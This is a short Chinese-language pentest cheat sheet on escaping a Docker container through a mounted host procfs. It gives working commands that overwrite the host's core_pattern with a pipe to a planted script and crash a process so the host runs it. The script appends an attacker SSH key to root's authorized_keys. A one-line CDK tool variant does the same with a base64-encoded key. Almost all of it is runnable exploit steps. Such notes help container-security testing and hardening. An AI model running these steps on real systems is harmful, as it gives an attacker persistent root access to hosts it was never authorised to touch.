Docker逃逸
1. 挂载宿主机procfs逃逸
1.1. 手动
#查看是否存在procfs挂载
find / -name core_pattern 2>/dev/null
#查看是否可以修改core_pattern
cat /proc/sys/kernel/core_pattern
>>>> /usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E #回显这个就是可以修改
#查看upperdir位置
cat /proc/mounts | grep docker
rw,relatime,lowerdir=/var/lib/docker/overlay2/l/6JC6FZQGYKHHL4O2O5VQZ2UEPE:/var/lib/docker/overlay2/l/ZNRTUHIEVJBUG4YHHAI2WF3CGQ:/var/lib/docker/overlay2/l/B7X5DEEX2MIUSMKAMKG66GHM6H:/var/lib/docker/overlay2/l/JZ26UVGDDLBIN2AV5AN2SMQ33Y:/var/lib/docker/overlay2/l/PXVXR6FJH7TBYMIBZZWZL7IYRG:/var/lib/docker/overlay2/l/5F2TSJQ5SBGSANBFCV5FWGDQYB:/var/lib/docker/overlay2/l/IQNAZRWMPNDLUYBKM7OUPGBZ4H:/var/lib/docker/overlay2/l/XJQQDLF67JL4LL4OIHGGMJMDOS,upperdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff,workdir=/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/wor
根目录新建一个exp.sh,把我们的公钥写入authorized_keys
#!/bin/bash
mkdir /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDVF88ItYRG1UwzIeL6ljhkAUuopU08NiNfcJPj7SO+x6UQNH18co75aaPZ1XPVeMji9jF3sa1nCcc+Bn0ls64mnO4ogXIKSdhj42nxS1/OWaBeBny5tkjbkFsE9+0DoqmIYA3Fj5JhQsAcdEUKLA1Jo09CvKks8hJ5OwX24M+06w== root@kali.com" >> /root/.ssh/authorized_keys
然后
chmod +x exp.sh
echo '|/var/lib/docker/overlay2/0158e7b92583381e25557d75696c90d5984f79e2abcf336a060e3b1f4c21982a/diff/exp.sh' > /host/proc/sys/kernel/core_pattern
sleep 10 & kill -SIGSEGV $!
这里以
|开头,内核会将该字符串后面的内容当成一个可执行程序或脚本。程序崩溃时,内核会启动该程序,并将崩溃堆栈信息通过标准输入(stdin)传给它。如果开头不加|那么会把将崩溃信息写入这个文件,而不会当做脚本执行
1.2. 自动
./cdk run mount-procfs /host/proc/ 'echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFBZ1FEVkY4OEl0WVJHMVV3ekllTDZsamhrQVV1b3BVMDhOaU5mY0pQajdTTyt4NlVRTkgxOGNvNzVhYVBaMVhQVmVNamk5akYzc2ExbkNjYytCbjBsczY0bW5PNG9nWElLU2RoajQybnhTMS9PV2FCZUJueTV0a2pia0ZzRTkrMERvcW1JWUEzRmo1SmhRc0FjZEVVS0xBMUpvMDlDdktrczhoSjVPd1gyNE0rMDZ3PT0gcm9vdEBrYWxpLmNvbQ== |base64 -d >> /root/.ssh/authorized_keys'